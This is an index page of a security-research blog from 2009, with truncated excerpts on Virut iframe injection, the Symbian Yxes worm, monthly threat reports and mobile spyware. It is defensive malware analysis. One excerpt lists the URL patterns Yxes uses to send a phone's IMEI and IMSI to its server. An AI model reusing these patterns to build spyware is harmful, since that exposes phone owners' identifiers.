Security Research | Page 57

Just happened to review our signature against virut-infected Web pages, and I would say, the infection is still very active until now. W32/Virut.CE is known to infect Web pages (HTML, ASP, and PHP) by injecting malicious iframe that redirects visiting users to Web sites serving malicious PDF and SWF files with different kinds of exploits. However, Virut is not the only agent of this iframe injection. Just minutes ago, I've searched a couple of infected Web sites specific for this injection compromise, and here's a good example. Figure 1 shows... [Read More]
by RSS Rex Plantado  |  Sep 01, 2009  |  Filed in: Security Research
There has been a lot of confusion lately concerning the SymbOS/Yxes worm. Among those, it has now dawned on me the so-called Transmitter.C reported in numerous articles on the net (for instance, here and here), is not sexySpace.sisx (detected as SymbOS/Yxes.E!worm): those are two different malware. Why ? As a matter of fact, several issues startled me (ordered from weakest to strongest point): Transmitter.C is reported to send a massive amount of SMS messages (they are talking about 500 SMS). If Transmitter.C is Yxes.E, it is surprising because... [Read More]
by RSS Axelle Apvrille  |  Aug 26, 2009  |  Filed in: Security Research
A team of British eccentrics has broken the 103-year-old record for a steam-powered car, previously standing at 127mph. The record now stands at close to 140mph, but with the super heated steam being injected into the turbine at more than twice the speed of sound, there is clearly more to the speed of the car than the speed of the steam. The good news about all this is that it does give us an excuse to look at the speed of security devices. Picking up your favourite data sheet, you can see speeds quoted based on link speeds, up to values... [Read More]
by RSS Darren Turnbull  |  Aug 26, 2009  |  Filed in: Security Research
Total detected malware volume continued a climbing trend this period, posting the highest levels detected to date this year. On top of this steep incline, highlighted since March 2009, the amount of distinct variants (malicious pieces of code) has also continued to gradually increase. Several malware attack waves were evident this period, most notably on the 24th of July when a huge surge of ZBot activity occurred through HTML/Agent.E!tr. In fact, this particular campaign posted record detection levels for a single-day run, surpassing that of the... [Read More]
by RSS Derek Manky  |  Aug 25, 2009  |  Filed in: Security Research
What's the difference between application visibility and true application security? In the below video, Rick Basile, Fortinet's senior director of technical services, chats with analyst Richard Stiennon about how the two approaches greatly differ, how a safe application could pose a threat to networks, and protection methods for applications in use by enterprises. (Click the picture to watch the video) [Read More]
by RSS Rick Popko  |  Aug 19, 2009  |  Filed in: Security Research
In case you are not familiar with the Symbian development process, application development features two major security meatures in Symbian OS 9.1 and greater. First, applications must specify their capabilities, i.e if an application uses Bluetooth connection, it must have the Symbian LocalServices capability. A few other interesting capabilities for malware are: NetworkServices: required to make a call, send HTTP requests etc. ReadUserData/WriteUserData: required to read/write user's contacts. UserEnvironment: to use the camera. Location: particularly... [Read More]
by RSS Axelle Apvrille  |  Aug 04, 2009  |  Filed in: Security Research
Last week, an online user reported to us that he cannot access some AV websites while he doesn't have problem with and He also added that he thinks his computer might be infected with the notorious Virut malware. Hmm... wait a minute, Virut doesn't include web site blocking capability just like how Conficker.C did a couple of months ago. So we asked a couple of samples immediately for us to verify his intuitions. Not surprisingly, its indeed a slightly modified version of W32/Virut.CE. I wasn't surprised because this... [Read More]
by RSS Rex Plantado  |  Jul 29, 2009  |  Filed in: Security Research
Tags: virut
Many threat trends have continued as we head into August 2009. I have highlighted notable items below from our July 2009 Threat Landscape report, which can be found on Fortinet's FortiGuard Center. Mobile threat development continues: In July we saw the emergence of SymbOS/Yxes.E and SymbOS/Yxes.F, the latest updated variants of Yxes that we first reported on in February. For further details, check out this blog post that is well worth the read: in particular, Yxes' served up dynamic content via JSP indeed shows the beginning steps as to how cyber... [Read More]
by RSS Derek Manky  |  Jul 27, 2009  |  Filed in: Security Research
The Symbian malware Yxes is (nearly) keeping me awake these days. Among other functionalities, it sends HTTP requests to a remote web server. The URLs it gets are the following: - Yxes.A: http://[REMOVED]/Kernel?Version= - Yxes.B or Yxes.E: http://[REMOVED]/Kernel.jsp?Version=&PhoneType= - Yxes.C: no similar URL - Yxes.D: this one issues two different requests: http://[REMOVED]/bs?Version=&PhoneImei=&PhoneImsi=&PhoneType= http://[REMOVED]/number/?PhoneType= http://[REMOVED]/index.jsp?PhoneType= - Yxes.F: http://[REMOVED]/PbkInfo.jsp?PhoneType=&PhoneImei=&PhoneImsi= TYPE... [Read More]
by RSS Axelle Apvrille  |  Jul 21, 2009  |  Filed in: Security Research
There are days where I wonder if people really care about privacy (except for these people). Most people don't see any problem in telling the entire world what they're doing (Twitter), who they know or see (Facebook) or where they are: the kind of stuff teenagers hate to tell their parents. Mobile phones are just the perfect platform for spying because they are portable (iPhones are such beauties one hates to leave them behind!) and seen as private devices (would you share your nice iPhone, huh?). Depending on functionalities, mobile spyware record... [Read More]
by RSS Axelle Apvrille  |  Jul 16, 2009  |  Filed in: Security Research